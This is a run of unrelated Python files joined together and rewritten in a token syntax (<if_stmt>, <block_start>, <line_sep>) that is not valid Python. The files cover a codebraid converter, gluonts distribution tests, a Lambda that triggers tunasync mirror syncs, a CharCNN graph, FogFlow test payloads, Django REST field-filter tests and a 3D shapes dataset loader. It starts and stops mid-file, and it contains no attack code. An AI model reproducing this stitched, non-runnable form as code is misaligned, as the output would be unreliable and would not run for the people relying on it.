'''<line_sep>copy_chunks=self.copy_chunks<if_stmt>any(cc.is_expr<for>cc copy_chunks)<block_start><if_stmt>len(copy_chunks)<g>1<block_start>invalid_cc_names=', '.join(cc.options['name']<for>cc copy_chunks<if>cc.is_expr)<line_sep>self.source_errors.append('Cannot copy multiple code chunks when some are expressions: {0}'.format(invalid_cc_names))<block_end><if_stmt>self.command<in>('paste' 'code')# Some commands inherit expression status. The code command # inherits so that subsequent copying doesn't result in # incorrectly concatenated expressions. Since the code # command never has output, this has no display side effects. <block_start>self.is_expr=<true><line_sep>self.expr_lines=<none><block_end><elif_stmt><not>self.is_expr<block_start>self.source_errors.append('A non-expression command cannot copy an expression code chunk')<block_end><block_end><elif_stmt>self.is_expr<block_start>self.source_errors.append('An expression command cannot copy a non-expression code chunk')<block_end><if_stmt>self.source_errors<block_start><return><block_end># Finalization must come after any potential `.is_expr` modifications self.finalize_after_copy()<if_stmt>self.inline<and>'code'<in>self.options['show']<and>(len(copy_chunks)<g>1<or>len(copy_chunks[0].code_lines)<g>1)<block_start>self.source_errors.append('Cannot copy and then display multiple lines of code in an inline context')<line_sep><return><block_end><if_stmt>len(copy_chunks)<eq>1<block_start>self.code_lines=copy_chunks[0].code_lines<block_end><else_stmt><block_start>self.code_lines=[line<for>x copy_chunks<for>line x.code_lines]<block_end><if_stmt>self.command<eq>'paste'<block_start><if_stmt>all(cc.command<eq>'code'<for>cc copy_chunks)# When possible, simplify the copying resolution process <block_start>self.has_output=<true><block_end><block_end>self.code_start_line_number=copy_chunks[0].code_start_line_number<block_end><def_stmt>copy_output self<block_start>''' Copy output (stdout, stderr, expr) for 'copy' option. This must be copied separately from code, after execution. This should only be invoked for a code chunk with no source errors, with copy targets that all exist and have no source errors. '''<if_stmt>self.command<ne>'paste'<block_start><raise>TypeError<block_end>copy_chunks=self.copy_chunks<line_sep># The case of all code chunks being code commands has already been # handled in `copy_code()` <if_stmt>any(cc.command<eq>'paste'<for>cc copy_chunks)<block_start><if_stmt>len(copy_chunks)<g>1<block_start><if_stmt>all(cc.command<eq>'paste'<for>cc copy_chunks)<block_start>self.source_errors.append('Can only copy a single paste code chunk; cannot combine multiple paste chunks')<block_end><else_stmt><block_start>self.source_errors.append('Cannot copy a mixture of paste and other code chunks')<block_end><block_end><block_end><elif_stmt>any(cc.execute<for>cc copy_chunks)<block_start><if_stmt><not>all(cc.execute<for>cc copy_chunks)<block_start>self.source_errors.append('Copying output of multiple code chunks requires that all or none are executed')<block_end><elif_stmt>len(copy_chunks)<g>1<block_start><if_stmt>len(set(cc.session_obj<for>cc copy_chunks))<g>1<block_start>self.source_errors.append('Cannot copy output from code chunks in multiple sessions')<block_end><elif_stmt>any(ccx.session_index<ne>ccy.session_index-1<for>ccx,ccy zip(copy_chunks[:-1] copy_chunks[1:]))<block_start><if_stmt>any(ccx<is>ccy<for>ccx,ccy zip(copy_chunks[:-1] copy_chunks[1:]))<block_start>self.source_errors.append('Cannot copy output of a single code chunk multiple times')<block_end><elif_stmt>any(ccx.session_index<g>ccy.session_index<for>ccx,ccy zip(copy_chunks[:-1] copy_chunks[1:]))<block_start>self.source_errors.append('Cannot copy output of code chunks out of order')<block_end><else_stmt><block_start>self.source_errors.append('Cannot copy output of code chunks when some chunks in a sequence are omitted')<block_end><block_end><block_end><block_end><else_stmt><block_start><raise>ValueError<block_end><if_stmt>self.source_errors# If errors, discard what has already been copied <block_start>self.code_lines=<none><line_sep><return><block_end><if_stmt>len(copy_chunks)<eq>1<block_start>self.stdout_lines=copy_chunks[0].stdout_lines<line_sep>self.stderr_lines=copy_chunks[0].stderr_lines<line_sep>self.repl_lines=copy_chunks[0].repl_lines<line_sep>self.rich_output=copy_chunks[0].rich_output<block_end><else_stmt><block_start>self.stdout_lines=[line<for>x copy_chunks<if>x.stdout_lines<is><not><none><for>line x.stdout_lines]<or><none><line_sep>self.stderr_lines=[line<for>x copy_chunks<if>x.stderr_lines<is><not><none><for>line x.stderr_lines]<or><none><line_sep>self.repl_lines=[line<for>x copy_chunks<if>x.repl_lines<is><not><none><for>line x.repl_lines]<or><none><line_sep>self.rich_output=[ro<for>x copy_chunks<if>x.rich_output<is><not><none><for>ro x.rich_output]<or><none><block_end><if_stmt>self.is_expr# expr compatibility has already been checked in `copy_code()` <block_start>self.expr_lines=copy_chunks[0].expr_lines<block_end>self.stdout_start_line_number=copy_chunks[0].stdout_start_line_number<line_sep>self.stderr_start_line_number=copy_chunks[0].stderr_start_line_number<line_sep>self.has_output=<true><block_end><def_stmt>layout_output self output_type output_format lines=<none><block_start>''' Layout all forms of output, except for rich output that is not text/plain, by performing operations such as line rewrapping and tab expansion. If `lines` is supplied, it is used. Otherwise, the default lines (if any) are accessed for the specified output type. '''<if_stmt>lines<is><not><none><block_start><if_stmt><not>lines<and>output_format<eq>'verbatim_or_empty'<block_start>lines=['\xa0']<block_end><pass><block_end><elif_stmt>output_type<eq>'code'<block_start>lines=self.code_lines<block_end><elif_stmt>output_type<eq>'repl'<block_start>lines=self.repl_lines<block_end><elif_stmt>output_type<in>('expr' 'stdout' 'stderr')<block_start>lines=getattr(self output_type+'_lines')<if_stmt>lines<is><none><and>output_format<eq>'verbatim_or_empty'<block_start>lines=['\xa0']<block_end><block_end><elif_stmt>output_type<eq>'markup'<block_start>lines=self.as_markup_lines<block_end><elif_stmt>output_type<eq>'example_markup'<block_start>lines=self.as_example_markup_lines<block_end><elif_stmt>output_type<eq>'copied_markup'<block_start><if_stmt>len(self.copy_chunks)<eq>1<block_start>lines=self.copy_chunks[0].as_markup_lines<block_end><elif_stmt>self.inline<block_start>lines=[]<for_stmt>cc self.copy_chunks<block_start>lines.extend(cc.as_markup_lines)<block_end><block_end><else_stmt><block_start>lines=[]<line_sep>last_cc=self.copy_chunks[-1]<for_stmt>cc self.copy_chunks<block_start>lines.extend(cc.as_markup_lines)<if_stmt>cc<is><not>last_cc<block_start>lines.append('')<block_end><block_end><block_end><block_end><else_stmt><block_start><raise>ValueError<block_end>rewrap_lines=self.options.get(output_type+'_rewrap_lines' <false>)<line_sep>rewrap_width=self.options.get(output_type+'_rewrap_width' 78)<line_sep>expand_tabs=self.options.get(output_type+'_expand_tabs' <false>)<line_sep>tab_size=self.options.get(output_type+'_tab_size' 8)<line_sep># This should be rewritten once rewrapping design is finalized, since # textwrap doesn't necessarily do everything as might be desired, and # the use of textwrap could be optimized if it continues to be used. # Nothing is done yet with tabs. <if_stmt>rewrap_lines<block_start>new_lines=[]<for_stmt>line lines<block_start><if_stmt><not>line<block_start>new_lines.append(line)<line_sep><continue><block_end>line_stripped=line.lstrip(' \t')<line_sep>indent=line[:len(line)-len(line_stripped)]<line_sep>new_lines.extend(textwrap.wrap(line_stripped width=rewrap_width-len(indent) initial_indent=indent subsequent_indent=indent))<block_end>lines=new_lines<block_end><if_stmt>self.inline<block_start><return>' '.join(lines)<block_end><return>'\n'.join(lines)<block_end><block_end><class_stmt>MetaConverter(type)<block_start>''' Metaclass for converters. Allows converters to register themselves by name and by compatible formats. '''<def_stmt>__init__ cls name bases dct<block_start><if_stmt><not>hasattr(cls '_registry')# Base Converter class <block_start>cls._registry={}<block_end><else_stmt># Subclass <block_start>cls._registry[name.lower()]=cls<if_stmt><not>all(attr<is><none><or>(isinstance(attr set)<and>attr<and>all(isinstance(x str)<for>x attr))<for>attr [cls.from_formats cls.multi_source_formats cls.to_formats])<block_start><raise>TypeError<block_end><if_stmt>(cls.from_formats<is><not><none><and>cls.multi_source_formats<is><not><none><and>cls.multi_source_formats-cls.from_formats)<block_start><raise>ValueError<block_end><block_end>super().__init__(name bases dct)<block_end><block_end><class_stmt>Converter(object)<block_start>''' Base class for converters. '''<line_sep>__metaclass__=MetaConverter<def_stmt>__init__ self * strings:Optional[Union[str Sequence[str]]]=<none> paths:Optional[Union[str Sequence[str] pathlib.Path Sequence[pathlib.Path]]]=<none> no_cache:Optional[bool]=<false> cache_path:Optional[Union[str pathlib.Path]]=<none> cross_source_sessions:bool=<true> expanduser:bool=<false> expandvars:bool=<false> from_format:Optional[str]=<none> session_defaults:Optional[Dict[str Union[bool str]]]=<none> synctex:bool=<false><block_start><if_stmt><not>all(isinstance(x bool)<for>x (cross_source_sessions expanduser expandvars))<block_start><raise>TypeError<block_end>self.cross_source_sessions=cross_source_sessions<line_sep>self.expanduser=expanduser<line_sep>self.expandvars=expandvars<line_sep>self.session_defaults=session_defaults<if_stmt>paths<is><not><none><and>strings<is><none><block_start><if_stmt>isinstance(paths str)<block_start>paths=[pathlib.Path(paths)]<block_end><elif_stmt>isinstance(paths pathlib.Path)<block_start>paths=[paths]<block_end><elif_stmt>isinstance(paths collections.abc.Sequence)<and>paths<block_start><if_stmt>all(isinstance(x str)<for>x paths)<block_start>paths=[pathlib.Path(x)<for>x paths]<block_end><elif_stmt><not>all(isinstance(x pathlib.Path)<for>x paths)<block_start><raise>TypeError<block_end><block_end><else_stmt><block_start><raise>TypeError<block_end>self.raw_source_paths=paths<line_sep># Names are based on paths BEFORE any expansion source_names=[p.as_posix()<for>p paths]<if_stmt><not>all(isinstance(x bool)<for>x (expanduser expandvars))<block_start><raise>TypeError<block_end><if_stmt>expandvars<block_start>paths=[pathlib.Path(os.path.expandvars(str(p)))<for>p paths]<block_end><if_stmt>expanduser<block_start>paths=[p.expanduser()<for>p paths]<block_end>self.expanded_source_paths=collections.OrderedDict(zip(source_names paths))<line_sep>source_strings=[]<for_stmt>p paths<block_start><try_stmt><block_start>source_string=p.read_text(encoding='utf_8_sig')<block_end><except_stmt>Exception<as>e<block_start><if_stmt><not>p.is_file()<block_start><raise>ValueError('File "{0}" does not exist'.format(p))<block_end><raise>ValueError('Failed to read file "{0}":\n {1}'.format(p e))<block_end><if_stmt><not>source_string<block_start>source_string='\n'<block_end>source_strings.append(source_string)<block_end>self.sources=collections.OrderedDict(zip(source_names source_strings))<if_stmt>self.from_formats<is><not><none><block_start><if_stmt>from_format<is><none><block_start><try_stmt><block_start>source_formats=set([self._file_extension_to_format_dict[p.suffix]<for>p paths])<block_end><except_stmt>KeyError<block_start><raise>TypeError('Cannot determine document format from file extensions, or unsupported format')<block_end>from_format=source_formats.pop()<if_stmt>source_formats<block_start><raise>TypeError('Cannot determine unambiguous document format from file extensions')<block_end><block_end><if_stmt>from_format<not><in>self.from_formats<block_start><raise>ValueError('Unsupported document format {0}'.format(from_format))<block_end><block_end>self.from_format=from_format<block_end><elif_stmt>strings<is><not><none><and>paths<is><none><block_start><if_stmt><not>all(x<is><false><for>x (expanduser expandvars))<block_start><if_stmt><not>all(isinstance(x bool)<for>x (expanduser expandvars))<block_start><raise>TypeError<block_end><raise>ValueError<block_end><if_stmt>isinstance(strings str)<block_start>strings=[strings]<block_end><elif_stmt><not>(isinstance(strings collections.abc.Sequence)<and>strings<and>all(isinstance(x str)<for>x strings))<block_start><raise>TypeError<block_end># Normalize newlines, as if read from file with universal newlines source_strings=[io.StringIO(s newline=<none>).read()<or>'\n'<for>s strings]<if_stmt>len(strings)<eq>1<block_start>source_names=['<string>']<block_end><else_stmt><block_start>source_names=['<string({0})>'.format(n+1)<for>n range(len(strings))]<block_end>self.sources=collections.OrderedDict(zip(source_names source_strings))<line_sep>self.raw_source_paths=<none><line_sep>self.expanded_source_paths=<none><if_stmt>from_format<is><none><block_start><raise>TypeError('Document format is required')<block_end><if_stmt>self.from_formats<is><not><none><and>from_format<not><in>self.from_formats<block_start><raise>ValueError('Unsupported document format {0}'.format(from_format))<block_end>self.from_format=from_format<block_end><else_stmt><block_start><raise>TypeError<block_end><if_stmt>len(self.sources)<g>1<and>from_format<not><in>self.multi_source_formats<block_start><raise>TypeError('Multiple sources are not supported for format {0}'.format(from_format))<block_end><if_stmt><not>isinstance(no_cache bool)<block_start><raise>TypeError<block_end>self.no_cache=no_cache<if_stmt>cache_path<is><none><block_start>cache_path=pathlib.Path('_codebraid')<block_end><elif_stmt>isinstance(cache_path str)<block_start>cache_path=pathlib.Path(cache_path)<block_end><elif_stmt><not>isinstance(cache_path pathlib.Path)<block_start><raise>TypeError<block_end><if_stmt>expandvars<block_start>cache_path=pathlib.Path(os.path.expandvars(cache_path.as_posix()))<block_end><if_stmt>expanduser<block_start>cache_path=cache_path.expanduser()<block_end>self.cache_path=cache_path<if_stmt>sys.version_info<l>(3 6)<block_start>cache_key_hasher=hashlib.sha512()<block_end><else_stmt><block_start>cache_key_hasher=hashlib.blake2b()<block_end><if_stmt>self.expanded_source_paths<is><none><block_start>cache_source_paths=<none><line_sep>cache_key_hasher.update(b'<string>')<block_end><else_stmt><block_start>cache_source_paths=[]<for_stmt>p self.expanded_source_paths.values()<block_start><try_stmt><block_start>p_final=pathlib.Path('~')/p.absolute().relative_to(pathlib.Path.home())<block_end><except_stmt>ValueError<block_start>p_final=p.absolute()<block_end>cache_source_paths.append(p_final)<line_sep>cache_key_hasher.update(p_final.as_posix().encode('utf8'))<line_sep>cache_key_hasher.update(cache_key_hasher.digest())<block_end><block_end>self.cache_source_paths=cache_source_paths<line_sep>self.cache_key=cache_key_hasher.hexdigest()[:16]<line_sep>self._io_map=<false><if_stmt><not>isinstance(synctex bool)<block_start><raise>TypeError<block_end>self.synctex=synctex<if_stmt>synctex<block_start>self._io_map=<true><block_end>self.code_chunks=[]<line_sep>self.code_options={}<block_end>from_formats=<none><line_sep>to_formats=<none><line_sep>multi_source_formats=<none><line_sep>_file_extension_to_format_dict={'.md':'markdown' '.markdown':'markdown' '.tex':'latex' '.ltx':'latex'}<def_stmt>code_braid self<block_start>self._extract_code_chunks()<line_sep>self._process_code_chunks()<line_sep>self._postprocess_code_chunks()<block_end><def_stmt>_extract_code_chunks self<block_start><raise>NotImplementedError<block_end><def_stmt>_process_code_chunks self<block_start>cp=codeprocessors.CodeProcessor(code_chunks=self.code_chunks code_options=self.code_options cross_source_sessions=self.cross_source_sessions no_cache=self.no_cache cache_path=self.cache_path cache_key=self.cache_key cache_source_paths=self.cache_source_paths session_defaults=self.session_defaults)<line_sep>cp.process()<block_end><def_stmt>_postprocess_code_chunks self<block_start><raise>NotImplementedError<block_end><def_stmt>convert self * to_format<block_start><raise>NotImplementedError<block_end><def_stmt>_save_synctex_data self data<block_start>zip_path=self.cache_path/'synctex.zip'<with_stmt>zipfile.ZipFile(str(zip_path) 'w' compression=zipfile.ZIP_DEFLATED)<as>zf<block_start>zf.writestr('synctex.json' json.dumps(data))<block_end><block_end><block_end>
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). # You may not use this file except in compliance with the License. # A copy of the License is located at # # http://www.apache.org/licenses/LICENSE-2.0 # # or in the "license" file accompanying this file. This file is distributed # on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either # express or implied. See the License for the specific language governing # permissions and limitations under the License. <import_stmt>itertools<import_stmt>mxnet<as>mx<import_stmt>numpy<as>np<import_stmt>pytest<import_from_stmt>gluonts.mx.distribution Binned BinnedOutput<line_sep>COMMON_KWARGS={"bin_log_probs":mx.nd.array([[0.1 0.2 0.1 0.05 0.2 0.1 0.25]]).log().repeat(axis=0 repeats=2) "bin_centers":mx.nd.array([[-5 -3 -1.2 -0.5 0 0.1 0.2]]).repeat(axis=0 repeats=2) }<line_sep>@pytest.fixture<def_stmt>labels <block_start><return>mx.random.uniform(low=-6 high=1 shape=(2 ))<block_end># T, N @pytest.mark.parametrize("K,alpha" itertools.product([1000 10000 100000] [0.001 0.01 0.1]))<def_stmt>test_smooth_mask_adds_to_one K alpha<block_start>bin_log_probs=mx.nd.log_softmax(mx.nd.ones(K))<line_sep>bin_centers=mx.nd.arange(K)<line_sep>dist=Binned(bin_log_probs=bin_log_probs bin_centers=bin_centers label_smoothing=0.2 )<line_sep>labels=mx.random.uniform(low=0 high=K shape=(12 )).expand_dims(-1)<line_sep>mask=dist._get_mask(labels)<line_sep>smooth_mask=dist._smooth_mask(mx.nd mask alpha=mx.nd.array([alpha]))<line_sep># check smooth mask adds to one <assert_stmt>np.allclose(smooth_mask.asnumpy().sum(axis=-1) np.ones(12) atol=1e-6)<block_end><def_stmt>test_get_smooth_mask_correct labels<block_start>dist=Binned(**COMMON_KWARGS label_smoothing=0.2)<line_sep>binned=Binned(**COMMON_KWARGS)<line_sep>labels=labels.expand_dims(-1)<line_sep>mask=dist._get_mask(labels)<assert_stmt>np.allclose(mask.asnumpy() binned._get_mask(labels).asnumpy())<line_sep>smooth_mask=dist._smooth_mask(mx.nd mask alpha=mx.nd.array([0.2]))<line_sep># check smooth mask adds to one <assert_stmt>np.allclose(smooth_mask.asnumpy().sum(axis=-1) np.ones(2))<line_sep># check smooth mask peaks same <assert_stmt>np.allclose(np.argmax(smooth_mask.asnumpy() axis=-1) np.argmax(mask.asnumpy() axis=-1) )<line_sep># check smooth mask mins correct <assert_stmt>np.allclose(smooth_mask.asnumpy().min(axis=-1) np.ones(2)<times>0.2/7# alpha / K )<block_end><def_stmt>test_loss_correct labels<block_start>smooth_alpha=Binned(**COMMON_KWARGS label_smoothing=0.4)<line_sep>smooth_noalpha=Binned(**COMMON_KWARGS label_smoothing=0.0)<line_sep>binned=Binned(**COMMON_KWARGS)<assert_stmt>np.allclose(binned.loss(labels).asnumpy() smooth_noalpha.loss(labels).asnumpy())<assert_stmt><not>np.allclose(binned.loss(labels).asnumpy() smooth_alpha.loss(labels).asnumpy())<block_end>@pytest.mark.parametrize("hybridize" [<true> <false>])<def_stmt>test_output_sets_alpha labels hybridize<block_start>binned_output=BinnedOutput(bin_centers=COMMON_KWARGS["bin_centers"][0] label_smoothing=0.35)<line_sep>arg_proj=binned_output.get_args_proj()<if_stmt>hybridize<block_start>arg_proj.hybridize()<block_end>arg_proj.initialize()<assert_stmt>(binned_output.distribution(arg_proj(mx.nd.random.uniform(2 10))).label_smoothing<eq>0.35)<block_end>
<import_stmt>json<import_stmt>urllib3<import_stmt>os<import_stmt>logging<line_sep>logger=logging.getLogger()<line_sep>logger.setLevel(logging.INFO)<line_sep>http=urllib3.PoolManager()<line_sep>tunasync_manager_url=os.environ['TUNASYNC_MANAGER_URL']<def_stmt>handler event context<block_start>logger.info(event)<line_sep>requestUrl=tunasync_manager_url+'/cmd'<line_sep>requestBody={}<line_sep>requestBody['cmd']='start'<line_sep>requestBody['worker_id']='tunasync-worker'<line_sep>requestBody['mirror_id']=event['repo']<line_sep>body=json.dumps(requestBody)<line_sep>logger.info("Request body:\n"+body)<line_sep>headers={'content-type':'application/json' 'content-length':str(len(body))}<try_stmt><block_start>response=http.request('POST' requestUrl body=body headers=headers retries=<false>)<line_sep>logger.info("Status code: "+str(response.status))<block_end><except_stmt>Exception<as>e<block_start>logger.error("Unable to send request to Tunasync manager")<line_sep>logger.exception(e)<block_end><block_end>
# !/usr/bin/python # -*- coding: utf-8 -*- # @time : 2020/5/7 21:06 # @author : Mo # @function: CharCNN [Character-level Convolutional Networks for Text Classification](https://arxiv.org/pdf/1509.01626.pdf) <import_from_stmt>macadam.base.graph graph<import_from_stmt>macadam K L M O<class_stmt>CharCNNGraph(graph)<block_start><def_stmt>__init__ self hyper_parameters<block_start>self.char_cnn_layers=hyper_parameters.get("graph" {}).get('char_cnn_layers' [[256 7 3] [256 7 3] [256 3 -1] [256 3 -1] [256 3 -1] [256 3 3]] )<line_sep>self.full_connect_layers=hyper_parameters.get("graph" {}).get('full_connect_layers' [1024 1024] )<line_sep>self.threshold=hyper_parameters.get("graph" {}).get('threshold' 1e-6)<line_sep>super().__init__(hyper_parameters)<block_end><def_stmt>build_model self inputs outputs<block_start>x=<none><line_sep># cnn + pool <for_stmt>char_cnn_size self.char_cnn_layers<block_start>x=L.Convolution1D(filters=char_cnn_size[0] kernel_size=char_cnn_size[1] )(outputs)<line_sep>x=L.ThresholdedReLU(self.threshold)(x)<if_stmt>char_cnn_size[2]<ne>-1<block_start>x=L.MaxPooling1D(pool_size=char_cnn_size[2] strides=1)(x)<block_end><block_end>x=L.Flatten()(x)<line_sep># full-connect 2 <for_stmt>full self.full_connect_layers<block_start>x=L.Dense(units=full )(x)<line_sep>x=L.ThresholdedReLU(self.threshold)(x)<line_sep>x=L.Dropout(self.dropout)(x)<block_end># dense label self.outputs=L.Dense(units=self.label activation=self.activate_end)(x)<line_sep>self.model=M.Model(inputs=inputs outputs=self.outputs)<line_sep>self.model.summary(132)<block_end><block_end>
subscription_data={"description":"A subscription to get info about Room1" "subject":{"entities":[{"id":"Room1" "type":"Room" }] "condition":{"attrs":["p3"]}} "notification":{"http":{"url":"http://192.168.100.162:8888"} "attrs":["p1" "p2" "p3"]} "expires":"2040-01-01T14:00:00.00Z" "throttling":5}<line_sep>#data to test the following code for broker.thinBroker.go:946 ''' subReqv2 := SubscriptionRequest{} err := r.DecodeJsonPayload(&subReqv2) if err != nil { rest.Error(w, err.Error(), http.StatusInternalServerError) return } '''<line_sep>subscriptionWrongPaylaod={"description":"A subscription to get info about Room1" "subject":{"entities":[{"id":"Room1" "type":"Room" "ispattern":"false"}] "condition":{"attrs":["p3"]}} "notification":{"http":{"url":"http://192.168.100.162:8888"} "attrs":["p1" "p2" "p3"]} "expires":"2040-01-01T14:00:00.00Z" "throttling":5}<line_sep>v1SubData={"entities":[{"id":"Room1" "type":"Room" }] "reference":"http://192.168.100.162:8668/ngsi10/updateContext"}<line_sep>updateDataWithupdateaction={"contextElements":[{"entityId":{"id":"Room1" "type":"Room"} "attributes":[{"name":"p1" "type":"float" "value":60} {"name":"p3" "type":"float" "value":69} {"name":"p2" "type":"float" "value":32}] "domainMetadata":[{"name":"location" "type":"point" "value":{"latitude":49.406393 "longitude":8.684208}}]}] "updateAction":"UPDATE"}<line_sep>createDataWithupdateaction={"contextElements":[{"entityId":{"id":"Room1" "type":"Room"} "attributes":[{"name":"p1" "type":"float" "value":90} {"name":"p3" "type":"float" "value":70} {"name":"p2" "type":"float" "value":12}] "domainMetadata":[{"name":"location" "type":"point" "value":{"latitude":49.406393 "longitude":8.684208}}]}] "updateAction":"CRETAE"}<line_sep>deleteDataWithupdateaction={"contextElements":[{"entityId":{"id":"Room1" "type":"Room"} "attributes":[{"name":"p1" "type":"float" "value":12} {"name":"p3" "type":"float" "value":13} {"name":"p2" "type":"float" "value":14}] "domainMetadata":[{"name":"location" "type":"point" "value":{"latitude":49.406393 "longitude":8.684208}}]}] "updateAction":"DELETE"}<line_sep>
<import_from_stmt>rest_framework.test APIClient<import_from_stmt>tests.app.serializers QuoteSerializer<import_from_stmt>tests.utils decode_content<def_stmt>test_list_response_unfiltered <block_start>response=APIClient().get('/quotes/')<line_sep>expected=[{'character':'Customer' 'line':"It's certainly uncontaminated by cheese" 'sketch':'CHEESE SHOP' } {'character':'The Black Knight' 'line':"It's just a flesh wound" 'sketch':'HOLY GRAIL' } ]<line_sep>content=decode_content(response)<assert_stmt>content<eq>expected<block_end><def_stmt>test_detail_response_unfiltered <block_start>response=APIClient().get('/quotes/parrot/')<line_sep>expected={'character':'Shopkeeper' 'line':"Well, he's...he's, ah...probably pining for the fjords" 'sketch':'PET SHOP' }<line_sep>content=decode_content(response)<assert_stmt>content<eq>expected<block_end><def_stmt>test_list_response_filtered_includes <block_start>response=APIClient().get('/quotes/?fields=character,line')<line_sep>expected=[{'character':'Customer' 'line':"It's certainly uncontaminated by cheese" } {'character':'The Black Knight' 'line':"It's just a flesh wound" } ]<line_sep>content=decode_content(response)<assert_stmt>content<eq>expected<block_end><def_stmt>test_detail_response_filtered_includes <block_start>response=APIClient().get('/quotes/parrot/?fields=character,line')<line_sep>expected={'character':'Shopkeeper' 'line':"Well, he's...he's, ah...probably pining for the fjords" }<line_sep>content=decode_content(response)<assert_stmt>content<eq>expected<block_end><def_stmt>test_list_response_filtered_excludes <block_start>response=APIClient().get('/quotes/?fields!=character')<line_sep>expected=[{'line':"It's certainly uncontaminated by cheese" 'sketch':'CHEESE SHOP' } {'line':"It's just a flesh wound" 'sketch':'HOLY GRAIL' } ]<line_sep>content=decode_content(response)<assert_stmt>content<eq>expected<block_end><def_stmt>test_detail_response_filtered_excludes <block_start>response=APIClient().get('/quotes/parrot/?fields!=character')<line_sep>expected={'line':"Well, he's...he's, ah...probably pining for the fjords" 'sketch':'PET SHOP' }<line_sep>content=decode_content(response)<assert_stmt>content<eq>expected<block_end><def_stmt>test_response_filtered_with_some_bogus_fields <block_start>response=APIClient().get('/quotes/parrot/?fields=sketch,spam,eggs')<line_sep>expected={'sketch':'PET SHOP' }<line_sep>content=decode_content(response)<assert_stmt>content<eq>expected<block_end><def_stmt>test_response_filtered_with_only_bogus_fields <block_start>response=APIClient().get('/quotes/parrot/?fields=blah')<line_sep>expected={}<line_sep>content=decode_content(response)<assert_stmt>content<eq>expected<block_end><def_stmt>test_response_filtered_with_multiple_fields_in_separate_query_args <block_start>response=APIClient().get('/quotes/parrot/?fields=character&fields=sketch')<line_sep>expected={'character':'Shopkeeper' 'sketch':'PET SHOP' }<line_sep>content=decode_content(response)<assert_stmt>content<eq>expected<block_end><def_stmt>test_response_filtered_with_include_and_exclude <block_start>response=APIClient().get('/quotes/parrot/?fields=character&fields=sketch&fields!=line')<line_sep>expected={'character':'Shopkeeper' 'sketch':'PET SHOP' }<line_sep>content=decode_content(response)<assert_stmt>content<eq>expected<block_end><def_stmt>test_exclude_wins_for_ambiguous_filtering <block_start>response=APIClient().get('/quotes/parrot/?fields=line,sketch&fields!=line')<line_sep>expected={'sketch':'PET SHOP' }<line_sep>content=decode_content(response)<assert_stmt>content<eq>expected<block_end><def_stmt>test_post_ignores_queryfields # Ensures that fields aren't dropped for other types of request <block_start>response=APIClient().post('/quotes/?fields=line,sketch')<line_sep>expected={'request_method':'POST' 'serializer_instance_fields':['character' 'line' 'sketch'] 'request_query':{'fields':'line,sketch'} }<line_sep>content=decode_content(response)<assert_stmt>content<eq>expected<block_end><def_stmt>test_instantiate_without_request_context # just test that it doesn't crash or b0rk the serializer to omit request context <block_start>data={'character':'the character' 'line':'the line' 'sketch':'the sketch' }<line_sep>serializer=QuoteSerializer(data=data)<assert_stmt>serializer.is_valid()<assert_stmt>sorted(serializer.get_fields())<eq>['character' 'line' 'sketch']<block_end>
<import_stmt>os<import_stmt>logging<import_from_stmt>torch.utils data<import_stmt>numpy<as>np<import_stmt>yaml<line_sep>logger=logging.getLogger(__name__)<line_sep># Fields <class_stmt>Field(object)<block_start>''' Data fields class. '''<def_stmt>load self data_path idx category<block_start>''' Loads a data point. Args: data_path (str): path to data file idx (int): index of data point category (int): index of category '''<line_sep><raise>NotImplementedError<block_end><def_stmt>check_complete self files<block_start>''' Checks if set is complete. Args: files: files '''<line_sep><raise>NotImplementedError<block_end><block_end><class_stmt>Shapes3dDataset(data.Dataset)<block_start>''' 3D Shapes dataset class. '''<def_stmt>__init__ self dataset_folder fields split=<none> categories=<none> no_except=<true> transform=<none> shared_dict={} n_views=24 cache_fields=<false> split_model_for_images=<false><block_start>''' Initialization of the the 3D shape dataset. Args: dataset_folder (str): dataset folder fields (dict): dictionary of fields split (str): which split is used categories (list): list of categories to use no_except (bool): no exception transform (callable): transformation applied to data points shared_dict (dict): shared dictionary (used for field caching) n_views (int): number of views (only relevant when using field caching) cache_fields(bool): whether to cache fields; this option can be useful for small overfitting experiments split_model_for_images (bool): whether to split a model by its views (can be relevant for small overfitting experiments to perform validation on all views) '''<line_sep># Attributes self.dataset_folder=dataset_folder<line_sep>self.fields=fields<line_sep>self.no_except=no_except<line_sep>self.transform=transform<line_sep>self.cache_fields=cache_fields<line_sep>self.n_views=n_views<line_sep>self.cached_fields=shared_dict<line_sep>self.split_model_for_images=split_model_for_images<if_stmt>split_model_for_images<block_start><assert_stmt>(n_views<g>0)<line_sep>print('You are splitting the models by images. Make sure that you entered the correct number of views.')<block_end># If categories is None, use all subfolders <if_stmt>categories<is><none><block_start>categories=os.listdir(dataset_folder)<line_sep>categories=[c<for>c categories<if>os.path.isdir(os.path.join(dataset_folder c))]<block_end>categories.sort()<line_sep># Read metadata file metadata_file=os.path.join(dataset_folder 'metadata.yaml')<if_stmt>os.path.exists(metadata_file)<block_start><with_stmt>open(metadata_file 'r')<as>f<block_start>self.metadata=yaml.load(f)<block_end><block_end><else_stmt><block_start>self.metadata={c:{'id':c 'name':'n/a'}<for>c categories}<block_end># Set index <for_stmt>c_idx,c enumerate(categories)<block_start>self.metadata[c]['idx']=c_idx<block_end># Get all models self.models=[]<for_stmt>c_idx,c enumerate(categories)<block_start>subpath=os.path.join(dataset_folder c)<if_stmt><not>os.path.isdir(subpath)<block_start>logger.warning('Category %s does not exist in dataset.'%c)<block_end>split_file=os.path.join(subpath str(split)+'.lst')<if_stmt><not>os.path.exists(split_file)<block_start>models_c=[f<for>f os.listdir(subpath)<if>os.path.isdir(os.path.join(subpath f))]<block_end><else_stmt><block_start><with_stmt>open(split_file 'r')<as>f<block_start>models_c=f.read().split('\n')<block_end><block_end>models_c=list(filter(<lambda>x:len(x)<g>0 models_c))<if_stmt>split_model_for_images<block_start><for_stmt>m models_c<block_start><for_stmt>i range(n_views)<block_start>self.models<augadd>[{'category':c 'model':m 'category_id':c_idx 'image_id':i}]<block_end><block_end><block_end><else_stmt><block_start>self.models<augadd>[{'category':c 'model':m 'category_id':c_idx}<for>m models_c]<block_end><block_end><block_end><def_stmt>__len__ self<block_start>''' Returns the length of the dataset. '''<line_sep><return>len(self.models)<block_end><def_stmt>__getitem__ self idx<block_start>''' Returns an item of the dataset. Args: idx (int): ID of data point '''<line_sep>category=self.models[idx]['category']<line_sep>model=self.models[idx]['model']<line_sep>c_idx=self.metadata[category]['idx']<line_sep>model_path=os.path.join(self.dataset_folder category model)<line_sep>data={}<for_stmt>field_name,field 